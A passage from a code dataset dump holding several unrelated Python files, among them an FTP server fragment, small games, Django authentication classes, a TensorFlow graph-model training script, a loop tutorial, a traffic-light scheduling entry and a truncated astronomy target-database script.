print('reading file')\n                if not self.isActiveMode:\n                    data_sock.send((reading + '\\r\\n').encode())\n                else:\n                    self.data_connection.send((reading + '\\r\\n').encode())\n                reading = file.read(8192)\n\n            file.close()\n            if not self.isActiveMode:\n                data_sock.close()\n            self.data_connection.close()\n            reply = '226 Closing data connection. Requested transfer action successful \\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + 
Requested transfer action successful \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n # should I close the data_connection\n\n # Function to upload file to server\n def STOR(self, argument):\n reply = '150 File status okay; about to open data connection.\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n if not self.isActiveMode:\n data_sock, data_address = self.data_connection.accept()\n filename = self.cwd + '/' + argument\n if self.type == 'A':\n file = open(filename, 'w')\n if not self.isActiveMode:\n file_data = data_sock.recv(8192).decode()\n else:\n file_data = self.data_connection.recv(8192).decode()\n\n while file_data:\n print('writing file')\n file.write(file_data)\n if not self.isActiveMode:\n file_data = data_sock.recv(8192).decode()\n else:\n file_data = self.data_connection.recv(8192).decode()\n\n file.close()\n if not self.isActiveMode:\n data_sock.close()\n self.data_connection.close()\n reply = '226 Closing data connection. Requested transfer action successful \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n elif self.type == 'I':\n file = open(filename, 'wb')\n if not self.isActiveMode:\n file_data = data_sock.recv(8192)\n else:\n file_data = self.data_connection.recv(8192)\n\n while file_data:\n print('writing file')\n file.write(file_data)\n if not self.isActiveMode:\n file_data = data_sock.recv(8192)\n else:\n file_data = self.data_connection.recv(8192)\n\n file.close()\n if not self.isActiveMode:\n data_sock.close()\n self.data_connection.close()\n reply = '226 Closing data connection. Requested transfer action successful \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n file.close()\n\n # Function to check if connection is still active\n def NOOP(self):\n reply = '200 NOOP OK \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to delete specific file\n def DELE(self, argument):\n file_name = argument\n file_path = self.cwd + '/' + str(file_name)\n if os.path.exists(file_path):\n os.remove(file_path)\n reply = '250 Requested file action okay, completed.\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n else:\n reply = '550 Could not execute delete, file not found\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to obtain create a directory\n def MKD(self, argument):\n directory_name = argument\n directory_path = self.cwd + '/' + str(directory_name)\n if os.path.exists(directory_path):\n reply = '550 Requested action not taken. 
File/Directory unavailable\\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n        else:\n            os.makedirs(directory_path)\n            reply = '257 Folder has been successfully created\\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n\n    # Function to delete specified working directory\n    def RMD(self, argument):\n        directory_name = argument\n        directory_path = self.cwd + '/' + str(directory_name)\n        if os.path.exists(directory_path):\n            os.rmdir(directory_path)\n            reply = '250 Requested file action okay, completed. \\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n        else:\n            reply = '550 Requested action not taken. File/Directory unavailable\\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n\n    # Function to change to parent directory\n    def CDUP(self):\n        print(self.cwd)\n        parent_directory = self.cwd.split('/')\n        parent_directory = parent_directory[:-1]\n        parent_directory = '/'.join(parent_directory)\n        print(parent_directory)\n\n        if os.path.exists(parent_directory):\n            self.cwd = parent_directory\n            reply = '200 Changed directory successfully \\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n        else:\n            reply = '550 Requested action not taken. File/Directory unavailable\\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n\n    # Function to end FTP session\n    def QUIT(self):\n        reply = '221 Goodbye\\r\\n'\n        print('Response sent to connected client ' + self.user + ': ' + reply)\n        self.command_connection.send(reply.encode())\n        self.command_connection.close()\n        self.isConnectionTerminated = True\n\n    # establish data connection in passive mode\n    def data_establish(self, host, port):\n        data_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        data_socket.bind((host, port))\n        data_socket.listen(5)\n        return data_socket\n
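\n# Added note on the PASV/PORT port encoding used above: the pair (p1, p2) in the reply encodes the data port as p1 * 256 + p2, e.g. (195, 80) -> 195 * 256 + 80 = 50000.\n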
\ndef main():\n    # Local Machine IP and port\n    host = socket.gethostbyname(socket.gethostname())\n    port = 6000\n\n    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    server_socket.bind((host, port))\n    print('FTP Server initialized at ' + host)\n    print(\"Awaiting a connection from a client\")\n\n    # infinite loop to accept multiple client connections and run them in separate threads\n    while True:\n        server_socket.listen(1)\n        connection_socket, address_ip = server_socket.accept()\n        thread = FTPServer(connection_socket, address_ip)\n        thread.start()\n\nif __name__ == '__main__':\n    main()","repo_name":"NetworkFundamentalsELEN4017/FTP-Project","sub_path":"FTP_Server.py","file_name":"FTP_Server.py","file_ext":"py","file_size_in_byte":17375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26697718968","text":"room = \"start\"\nkey = False\nlooked = False\n\nwhile room != \"end\":\n    if room == \"start\":\n        print(\"Actions available: forward, look\")\n        action = input(\"> \")\n        if action == \"forward\":\n            room = \"middle\"\n\n    elif room == \"middle\":\n        if looked == True:\n            print(\"Actions available: forward, backward, look, pickup\")\n        else:\n            print(\"Actions available: forward, backward, look\")\n        action = input(\"> \")\n        if action == \"forward\":\n            if key == True:\n                room = \"end\"\n            else:\n                print(\"The door is locked.\")\n        elif action == \"backward\":\n            room = \"start\"\n        elif action == \"look\":\n            print(\"You spot a key on the floor.\")\n            looked = True\n        elif action == \"pickup\":\n            print(\"You picked up the key!\")\n            key = True\n\n    if room == \"start\":\n        print(\"You are standing in the entrance to the castle. There is no exit.\")\n    elif room == \"middle\":\n        print(\"You are in the middle room of the castle.\")\nprint(\"You have unlocked the door and escaped the castle. You win!\")\n","repo_name":"computingacademy/tcc-webinar-two","sub_path":"castle-game/castle.py","file_name":"castle.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6171743844","text":"from tkinter import *\nimport tkinter.messagebox\nmain_window=Tk()\nmain_window.title(\"Tic-Tac-Toe\")\nmain_window.geometry(\"540x590\")\nmain_window.resizable(False, False)\nk=1\ncount=0\nmy_font=('Segoe UI Historic',11,'bold')\nmy_font1=('Adobe Hebrew',10,'bold')\ndef clearbuttons():\n    B1['text']=''\n    B1.configure(bg='SystemButtonFace')\n    B2['text']=''\n    B2.configure(bg='SystemButtonFace')\n    B3['text']=''\n    B3.configure(bg='SystemButtonFace')\n    B4['text']=''\n    B4.configure(bg='SystemButtonFace')\n    B5['text']=''\n    B5.configure(bg='SystemButtonFace')\n    B6['text']=''\n    B6.configure(bg='SystemButtonFace')\n    B7['text']=''\n    B7.configure(bg='SystemButtonFace')\n    B8['text']=''\n    B8.configure(bg='SystemButtonFace')\n    B9['text']=''\n    B9.configure(bg='SystemButtonFace')\ndef checking():\n    global k,count\n    if((B1['text']=='X' and B2['text']=='X' and B3['text']=='X') or (B2['text']==\"X\" and B5['text']=='X' and B8['text']=='X')\n    or (B1['text']=='X' and B4['text']=='X' and B7['text']=='X') or (B3['text']=='X'and B6['text']=='X' and B9['text']=='X')\n    or (B1['text']=='X' and B5['text']=='X' and B9['text']=='X') or (B3['text']=='X'and B5['text']=='X' and B7['text']=='X')\n    or (B4['text']=='X' and B5['text']=='X' and B6['text']=='X') or (B7['text']=='X'and B8['text']=='X' and B9['text']=='X')):\n        tkinter.messagebox.showinfo(\"Tic-Tac-Toe\",\"Congrats!! X IS THE WINNER\")\n        k=1\n        count=0\n        clearbuttons()\n    elif((B1['text']=='O' and B2['text']=='O' and B3['text']=='O') or (B2['text']==\"O\" and B5['text']=='O' and B8['text']=='O')\n    or (B1['text']=='O' and B4['text']=='O' and B7['text']=='O') or (B3['text']=='O'and B6['text']=='O' and B9['text']=='O')\n    or (B1['text']=='O' and B5['text']=='O' and B9['text']=='O') or (B3['text']=='O'and B5['text']=='O' and B7['text']=='O')\n    or (B4['text']=='O' and B5['text']=='O' and B6['text']=='O') or (B7['text']=='O'and B8['text']=='O' and B9['text']=='O')):\n        tkinter.messagebox.showinfo(\"Tic-Tac-Toe\", \"Congrats!! O IS THE WINNER\")\n        k=1\n        count=0\n        clearbuttons()\n    elif(count==9):\n        tkinter.messagebox.showinfo(\"Tic-Tac-Toe\", \"Oh!! 
Its a Tie Game\")\n k=1\n count=0\n clearbuttons()\ndef cliking(B):\n global k,count\n if(B['text']==''):\n if(k):\n B['text']='X'\n k=0\n count=count+1\n B.configure(bg='#63f2eb')\n else:\n B['text']='O'\n k=1\n count=count+1\n B.configure(bg='#FF69B4')\n if(count>=5):\n checking()\nB1=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B1),font=my_font)\nB2=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B2),font=my_font)\nB3=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B3),font=my_font)\nB4=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B4),font=my_font)\nB5=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B5),font=my_font)\nB6=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B6),font=my_font)\nB7=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B7),font=my_font)\nB8=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B8),font=my_font)\nB9=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B9),font=my_font)\nB1.grid(row=0,column=0)\nB2.grid(row=0,column=1)\nB3.grid(row=0,column=2)\nB4.grid(row=1,column=0)\nB5.grid(row=1,column=1)\nB6.grid(row=1,column=2)\nB7.grid(row=2,column=0)\nB8.grid(row=2,column=1)\nB9.grid(row=2,column=2)\nLabel(main_window,text=\"Player 1 is X,Player 2 is O\",font=my_font1).grid(row=4,column=1)\nend=Button(main_window,text=\"End Game\",command=main_window.destroy,bg='orange',font=my_font)\nend.grid(row=5,column=1)\nmain_window.mainloop()","repo_name":"SurajKumar-27/Tic-tac-toe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32141894240","text":"from urllib.error import HTTPError\nfrom urllib.request import Request, urlopen\nfrom urllib.parse import urljoin\nfrom cgi import parse_header\nimport json\nfrom django.conf import settings\nfrom rest_framework import authentication\nfrom rest_framework import exceptions\nfrom rest_framework.authentication import get_authorization_header\n\n\nclass User(object):\n def __init__(self, id):\n self.__id = id\n\n def get_id(self):\n return self.__id\n\n def is_authenticated(self):\n return True\n\n def __str__(self):\n return \"User \" + str(self.__id)\n\n\nclass PolicyCompassAuthentication(authentication.BaseAuthentication):\n def authenticate(self, request):\n token = self.__get_token(request)\n if token:\n return User(token), None\n else:\n return None\n\n def __get_token(self, request):\n auth = get_authorization_header(request).split()\n\n if not auth or auth[0].lower() != b'token':\n return None\n\n if len(auth) == 1:\n msg = 'Invalid token header. No credentials provided.'\n raise exceptions.AuthenticationFailed(msg)\n\n elif len(auth) > 2:\n msg = 'Invalid token header. 
Token string should not contain spaces.'\n            raise exceptions.AuthenticationFailed(msg)\n\n        return auth[1]\n\n\nclass AdhocracyUser:\n    def __init__(self, user_resource_path, is_admin=False):\n        self.resource_path = user_resource_path\n        self.is_admin = is_admin\n        self.is_staff = False\n        self.is_superuser = is_admin\n        self.user_permissions = []\n        self.groups = []\n\n    def get_username(self):\n        return self.resource_path\n\n    def is_authenticated(self):\n        return True\n\n    def get_all_permissions(self):\n        return self.user_permissions\n\n    def set_password(self, _password):\n        raise NotImplementedError\n\n    def check_password(self, _password):\n        raise NotImplementedError\n\n    def save(self):\n        raise NotImplementedError\n\n    def delete(self):\n        raise NotImplementedError\n\n    def __repr__(self):\n        return \"AdhocracyUser('%s', is_admin=%r)\" % (self.resource_path, self.is_admin)\n\n\nclass AdhocracyAuthentication(authentication.BaseAuthentication):\n    def authenticate(self, request):\n        adhocracy_base_url = settings.PC_SERVICES['references'][\n            'adhocracy_api_base_url']\n        user_path = request.META.get('HTTP_X_USER_PATH')\n        user_token = request.META.get('HTTP_X_USER_TOKEN')\n        user_url = urljoin(adhocracy_base_url, user_path)\n\n        if user_path is None and user_token is None:\n            return None\n        elif user_path is None or user_token is None:\n            raise exceptions.AuthenticationFailed(\n                'No `X-User-Path` and `X-User-Token` header provided.')\n\n        request = Request(user_url)\n        request.add_header('X-User-Path', user_url)\n        request.add_header('X-User-Token', user_token)\n\n        try:\n            response = urlopen(request)\n\n            content_type, params = parse_header(\n                response.getheader(\"content-type\"))\n            encoding = params['charset'].lower()\n            if content_type != \"application/json\":\n                raise exceptions.AuthenticationFailed(\n                    'Adhocracy authentication failed due to wrong response.')\n            resource_as_string = response.read().decode(encoding)\n            user_resource = json.loads(resource_as_string)\n            roles = user_resource['data'][\n                'adhocracy_core.sheets.principal.IPermissions']['roles']\n\n            is_admin = 'admin' in roles\n            return (AdhocracyUser(user_path, is_admin), None)\n\n        except HTTPError as e:\n            if (e.code == 400):\n                raise exceptions.AuthenticationFailed(\n                    'Adhocracy authentication failed due to invalid credentials.')\n            else:\n                raise\n","repo_name":"policycompass/policycompass-services","sub_path":"policycompass_services/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32005761533","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nimport logging\nimport datetime\nfrom spiro.core.backends import TENSORFLOW\nfrom spiro.core.config import set_backend\nset_backend(TENSORFLOW)\nfrom spiro.dtdg.dataloader import ogb_dataset, supported_ogb_datasets\nfrom spiro.dtdg.models.encoder.implicitTimeEncoder.staticGraphEncoder import GCN, SGCN, GAT, GraphSage\nfrom spiro.dtdg.models.decoder.sequentialDecoders import SelfAttention, PTSA, FTSA, Conv1D, NodeTrackingPTSA\nfrom spiro.dtdg.models.decoder.simpleDecoders import MLP\nfrom spiro.core.commonF import to_tensor\nfrom spiro.core.utils import printProgressBar\nfrom spiro.automl.model_assembler import assembler\nfrom spiro.automl.tf.prepare_dataset import prepare_citation_task, TARGET, LABEL\nfrom spiro.automl.tf.batch_training import NodeBatchGenerator\n\n\n\"\"\"\ndef loss_fn(predict, label):\n    return torch.sqrt(torch.mean(torch.abs(torch.log1p(predict) - 
torch.log1p(label))))\n\"\"\"\nif __name__ == '__main__':\n #----------------------------------------------------------------\n data_to_test = supported_ogb_datasets()[1]\n this_graph = ogb_dataset(data_to_test)\n n_snapshot = len(this_graph)\n n_nodes = this_graph.dispatcher(n_snapshot -1)[0].observation.num_nodes()\n this_snapshot,_ = this_graph.dispatcher(20)\n in_dim = this_snapshot.num_node_features()\n hidden_dim = 32\n num_GNN_layers = 2\n num_RNN_layers = 3\n output_dim = 10\n layer_dims = [64,output_dim]\n activation_f = None\n encoders = ['gcn', 'sgcn', 'gat', 'sage']\n decoders = ['sa', 'ptsa', 'node_tracking_ptsa', 'tsa_sum', 'node_tracking_tsa', 'conv1d']\n epochs = 1000\n prepare_citation_task(this_graph)\n for g in range(1):\n for r in range(6):\n #set up logger\n this_logger = logging.getLogger('citation_predictoin_pipeline')\n this_logger.setLevel(logging.INFO)\n # create file handler which logs even debug messages\n log_path = f\"model_{encoders[g]}_{decoders[r]}.log\"\n fh = logging.FileHandler(log_path)\n fh.setLevel(logging.DEBUG)\n for hdlr in this_logger.handlers[:]: # remove all old handlers\n this_logger.removeHandler(hdlr)\n this_logger.addHandler(fh)\n this_logger.info(\"--------------------------------------------------------\")\n for trial in range(10):\n this_logger.info(\"--------------------------------------------------------\")\n this_logger.info(f\"start trial {trial}\")\n if g == 0:\n gnn = GCN(num_GNN_layers, in_dim, hidden_dim, activation=None,norm='none', allow_zero_in_degree=True, dropout=0.2)\n elif g == 1:\n gnn = SGCN(num_GNN_layers, in_dim, hidden_dim ,allow_zero_in_degree=True)\n elif g == 2:\n gnn = GAT([1], in_dim, hidden_dim, activation=activation_f,allow_zero_in_degree=True)\n else:\n gnn = GraphSage('gcn', in_dim, hidden_dim, activation=activation_f)\n\n output_decoder = MLP(output_dim, [hidden_dim,20,10,5], activation=\"linear\")\n \n if r == 0:\n sa = SelfAttention( 3, hidden_dim, [8,output_dim], n_nodes, 5, output_decoder)\n elif r == 1:\n sa = PTSA( 3, hidden_dim,layer_dims , n_nodes, 5, output_decoder)\n elif r == 2:\n sa = NodeTrackingPTSA( 3, hidden_dim,layer_dims , n_nodes, 5, output_decoder)\n elif r == 3:\n sa = FTSA( 3, hidden_dim, layer_dims, n_nodes, 5,3,'sum', output_decoder)\n elif r == 4:\n sa = FTSA( 3, hidden_dim, layer_dims, n_nodes, 5,3,'sum', output_decoder, node_tracking=True)\n elif r == 5:\n sa = Conv1D(hidden_dim, [8,output_dim], n_nodes, 5, output_decoder)\n else:\n pass\n\n\n this_model = assembler(gnn, sa)\n save_path = f\"model_{encoders[g]}_{decoders[r]}_{trial}\"\n loss_fn_eval = keras.losses.MeanSquaredError()\n loss_fn = keras.losses.MeanAbsolutePercentageError()\n loss_list=[]\n all_predictions=[]\n eval_loss = []\n eval_predictions = []\n eval_loss2 = []\n eval_predictions2= []\n lr = 1e-3\n optimizer = keras.optimizers.Adam(learning_rate=lr, epsilon=1e-8)\n batch_size = 5000\n batchs = NodeBatchGenerator(this_graph, 40, 10, n_snapshot-2)\n eval_batchs = NodeBatchGenerator(this_graph, 40, n_snapshot-2, n_snapshot-1)\n total_batches = len(batchs)\n for epoch in range(epochs):\n this_model.decoder.training()\n this_model.decoder.memory.reset_state()\n progress = 0\n printProgressBar(progress, total_batches, prefix = 'Progress:', suffix = 'Complete', length = 50)\n for snapshot, target, label in batchs:\n with tf.GradientTape() as tape:\n predict = tf.reshape(this_model((snapshot,target), training=True), (-1))\n all_predictions.append(predict.numpy())\n loss = loss_fn(label,predict)\n grads = 
tape.gradient(loss, this_model.trainable_weights)\n                    optimizer.apply_gradients(zip(grads, this_model.trainable_weights))\n                    loss_list.append(loss.numpy())\n                    progress+=1\n                    printProgressBar(progress, total_batches, prefix = 'Progress:', suffix = 'Complete', length = 50)\n                print(f\"train loss: {loss_list[-1]}\")\n                eval_t = n_snapshot - 2\n                predicts = np.array([])\n                labels = np.array([])\n                for snapshot, target, label in eval_batchs:\n                    predicts = tf.experimental.numpy.hstack((predicts,tf.reshape(this_model((snapshot,target)),(-1))))\n                    labels = tf.experimental.numpy.hstack((labels, label))\n                eval_predictions.append(predicts)\n                print(eval_predictions[-1][:20])\n                print(labels[:20])\n                test_loss = loss_fn(labels, predicts).numpy()\n                print(f\"test loss:{test_loss}\")\n                eval_loss.append(test_loss)\n                test_loss_2 = loss_fn_eval(labels, predicts).numpy()\n                eval_loss2.append(test_loss_2)\n                print(f\"eval loss: {test_loss_2}\")\n                mini = min(eval_loss)\n                batchs.on_epoch_end()\n                eval_batchs.on_epoch_end()\n                if eval_loss[-1] == mini:\n                    print(f\"save best model for loss {mini}\")\n                    this_model.save_model(save_path)\n                if epoch > 10:\n                    # early stop once the last 40 eval losses are all above the best so far\n                    if all(l > mini for l in eval_loss[-40:]):\n                        print(mini)\n                        break\n\n            this_logger.info(loss_list)\n            this_logger.info(eval_loss)\n            this_logger.info(eval_loss2)\n            this_logger.info(f\"best loss {mini}\")\n\n\"\"\"\n    gnn = GCN(num_GNN_layers, in_dim, hidden_dim, activation=activation_f, allow_zero_in_degree=True, dropout=0.2)\n    output_decoder = MLP(output_dim, [hidden_dim,20,10,5])\n    decoder = FTSA( 3, hidden_dim, [8], n_nodes, 7,3,'sum', output_decoder)\n    new_model = assembler(gnn, decoder)\n    new_snapshot = this_graph.dispatcher(n_snapshot-2)\n    next_snapshot = this_graph.dispatcher(n_snapshot-1)\n    node_samples = np.arange(this_snapshot.num_nodes())\n    new_predict = new_model((this_snapshot, node_samples))\n    new_model.load_model(save_path)\n    new_model.decoder.memory.reset_state()\n    for t in range(1,n_snapshot-2):\n        this_snapshot = this_graph.dispatcher(t)\n        next_snapshot = this_graph.dispatcher(t+1)\n        node_samples = np.arange(this_snapshot.num_nodes())\n        predict = new_model((this_snapshot,node_samples))\n        label = next_snapshot.node_feature()[:this_snapshot.num_nodes(), -1]\n        all_predictions.append(tf.squeeze(predict).numpy())\n        loss = loss_fn(tf.squeeze(predict), label)\n        loss_list.append(loss.numpy())\n        print(loss_list[-1])\n\n    this_snapshot = this_graph.dispatcher(n_snapshot-2)\n    next_snapshot = this_graph.dispatcher(n_snapshot-1)\n    node_samples = np.arange(this_snapshot.num_nodes())\n    predict = new_model((this_snapshot,node_samples))\n    label = next_snapshot.node_feature()[:this_snapshot.num_nodes(), -1]\n    eval_predictions.append(tf.squeeze(predict).numpy())\n    loss = loss_fn(tf.squeeze(predict), label)\n    eval_loss.append(loss.numpy())\n    print(eval_loss[-1])\n\"\"\"\n","repo_name":"mcgill-cpslab/spiral","sub_path":"examples/tf/citation_prediction_sliding_window_decoder_batch.py","file_name":"citation_prediction_sliding_window_decoder_batch.py","file_ext":"py","file_size_in_byte":9000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38001491648","text":"\"\"\"\nwhile loop\n\nwhile boolean_expression:\n    # loop body\n    # increment (or decrement)\n\nas long as the expression is true, the loop keeps running\n\nNOTE: always mind the stopping criterion, otherwise it becomes an infinite loop...\n\nBreak\n\nwe use break to exit a loop in a planned way\n\n\n\"\"\"\n\nn = 0\nwhile n < 5:\n    print(n)\n    n = n+1\nprint('')\n
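# Added note: the increment (n = n+1) above is the stopping criterion in action; without it, n < 5 would stay true forever and the loop would run endlessly.\n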
v = ''\nwhile v != 'yes':\n    v = input('Is it over yet, Jessica? ')\n\nc = 0\nwhile c < 10:\n    c += 1\n    if c == 7:\n        break\n    else:\n        print(c)\nprint('exited the loop')\n","repo_name":"JorgeRoniel/Curso-de-Python","sub_path":"seção_6/loop_while.py","file_name":"loop_while.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37526273556","text":"###############################\n##\n## HASH CODE ENTRY\n##\n## Usage: python main.py <file_location> <output_location>\n##\n###############################\nimport sys\nimport os\nimport math\nfrom .utils.car import Car\nfrom .utils.street import Street\nfrom .utils.intersection import Intersection\n\ndef main(file_location, output_location):\n    print(\"Running Hash Code Entry\")\n    # Hash Code here :)\n\n    input_file = open(file_location, \"r\")\n\n    line_num = 0\n    duration = 0\n    num_intersections = 0\n    num_streets = 0\n    num_cars = 0\n    bonus = 0\n    intersections = []\n    streets = []\n    cars = []\n    for line in input_file:\n        if line_num == 0:\n            numbers = line.split(\" \")\n            duration = int(numbers[0])\n            num_intersections = int(numbers[1])\n            num_streets = int(numbers[2])\n            num_cars = int(numbers[3])\n            bonus = int(numbers[4])\n            intersections = create_intersections(num_intersections)\n        elif line_num <= num_streets:\n            street_info = line.split(\" \")\n            a_street = Street(street_info[2], int(street_info[3]))\n            streets.append(a_street)\n            intersections[int(street_info[1])].add_incoming_street(a_street)\n        else:\n            car_info = line.split(\" \")\n            cars.append(Car(int(car_info[0]), car_info[1:]))\n        line_num += 1\n    input_file.close()\n    print(f\"Created {len(intersections)} intersections\")\n    print(f\"Created {len(streets)} streets\")\n    print(f\"Created {len(cars)} cars\")\n\n    # Check street usage\n    add_street_usage(cars, streets, file_location)\n\n    # Check inter usage\n    used_intersections = list(filter(lambda x: x.ever_used(), intersections))\n    \n    # Output\n    output_file = open(output_location, \"w\")\n    output_file.write(f\"{str(len(used_intersections))}\\n\")\n    for inter in used_intersections:\n        output_file.write(f\"{str(inter.id)}\\n\")\n        used_streets = list(filter(lambda x: x.usage > 0, inter.incoming_streets))\n        output_file.write(f\"{str(len(used_streets))}\\n\")\n\n        used_streets.sort(key=lambda x: x.starting_cars, reverse=True)\n        total_inter_usage = 0\n        for street in used_streets:\n            total_inter_usage += street.usage\n\n        t = duration / 214\n        for street in used_streets:\n            fraction = street.usage / total_inter_usage\n            green_time = max(1, math.floor(t * fraction))\n            output_file.write(f\"{street.name} {green_time}\\n\")\n\n    output_file.close()\n\n\n\ndef create_intersections(num):\n    intersections = []\n    for i in range(num):\n        intersections.append(Intersection(i))\n    return intersections\n\n\ndef add_street_usage(cars, streets, file_location):\n    head_tail = os.path.split(file_location) \n    file_name = os.path.join(\".\\\\cache\", head_tail[1])\n\n    if os.path.isfile(file_name):\n        print(\"Using Cache\")\n        input_file = open(file_name, \"r\")\n        count = 0\n        for line in input_file:\n            values = line.split(\" \")\n            streets[count].set_usage(int(values[0]))\n            streets[count].set_starting_cars(int(values[1]))\n            count += 1\n    else:\n        print(\"Writing Cache\")\n        for a_car in cars:\n            first = True\n            for street_name in a_car.roads:\n                for a_street in streets:\n                    if a_street.name == street_name:\n                        a_street.add_usage()\n                        if first:\n                            a_street.add_starting_cars()\n                        break\n                first = False\n\n        # Write street usage to file as cache\n        output_file = open(file_name, \"w\")\n        for s in streets:\n            
output_file.write(f\"{s.usage} {s.starting_cars}\\n\")\n\n\n# When run from the terminal\nif __name__ == '__main__':\n main(sys.argv[1], sys.argv[2])","repo_name":"hexmod/hash-code-2021","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17330746297","text":"import os\nimport numpy as np\nimport peewee\nimport astropy.io.ascii\nimport sdssdb.peewee.sdss5db.targetdb as targetdb\nimport sdssdb.peewee.sdss5db.catalogdb as catalogdb\n\nfrom sdssdb.peewee.sdss5db import database\ndatabase.set_profile('operations')\n\ntarget_dtype = [('stage', np.unicode_, 6),\n ('rsid', np.int64), # set equal to carton_to_target_pk\n ('carton_to_target_pk', np.int64), # from carton_to_target\n ('priority', np.int32),\n ('value', np.float32),\n ('lambda_eff', np.float32),\n ('delta_ra', np.float64),\n ('delta_dec', np.float64),\n ('can_offset', bool),\n ('ra', np.float64), # from target\n ('dec', np.float64),\n ('epoch', np.float32),\n ('pmra', np.float32),\n ('pmdec', np.float32),\n ('parallax', np.float32),\n ('catalogid', np.int64),\n ('catalogdb_plan', str, 12),\n ('target_pk', np.int64),\n ('magnitude', np.float32, 10), # from magnitude\n ('carton', np.unicode_, 60), # from carton\n ('carton_pk', np.int32),\n ('program', np.unicode_, 15), \n ('mapper', np.unicode_, 3), # from mapper\n ('category', np.unicode_, 15), # from category\n ('cadence', np.unicode_, 26), # from cadence\n ('fiberType', np.unicode_, 6), # from instrument\n ('plan', np.unicode_, 8), # from version\n ('tag', np.unicode_, 8)]\n\n\ndef read_cartons(version=None, filename=None):\n \"\"\"Read in cartons\n\n Parameters\n ----------\n\n version : str\n version of carton file\n\n filename : str\n explicit file name of carton file\n\n Returns\n -------\n\n cartons : Table\n table with carton information\n\n\n Notes\n -----\n\n Reads file as fixed_width, |-delimited file with astropy.io.ascii\n\n If filename is specified, reads in that file.\n\n If not, and version is specified, reads in $RSCONFIG_DIR/etc/cartons-[version].txt\n\"\"\"\n if((version is None) and (filename is None)):\n print(\"Must specify either version or filename!\")\n return\n\n if(filename is None):\n filename = os.path.join(os.getenv('RSCONFIG_DIR'),\n 'etc', 'cartons-{version}.txt')\n filename = filename.format(version=version)\n\n cartons = astropy.io.ascii.read(filename, format='fixed_width',\n delimiter='|')\n return(cartons)\n\n\ndef get_targets(carton=None, version=None, justcount=False, c2c=None):\n \"\"\"Pull targets from the targetdb\n\n Parameters\n ----------\n\n cartons : str\n label of carton to pull\n\n version : str\n plan of carton to pull\n\n justcount : bool\n if True, just return the count (default False)\n\n c2c : config\n if not None, maps cartons to fiber type and cadences (default None)\n\"\"\"\n if(justcount):\n print(\"Counting carton {p}, version {v}\".format(p=carton,\n v=version))\n else:\n print(\"Extracting carton {p}, version {v}\".format(p=carton,\n v=version))\n\n # First look at all targets in this carton/version\n ntall = (targetdb.Target.select(targetdb.Target.pk)\n .join(targetdb.CartonToTarget)\n .join(targetdb.Carton)\n .join(targetdb.Version)\n .where((targetdb.Carton.carton == carton) &\n (targetdb.Version.plan == version))).count()\n\n if(justcount):\n print(\" ... 
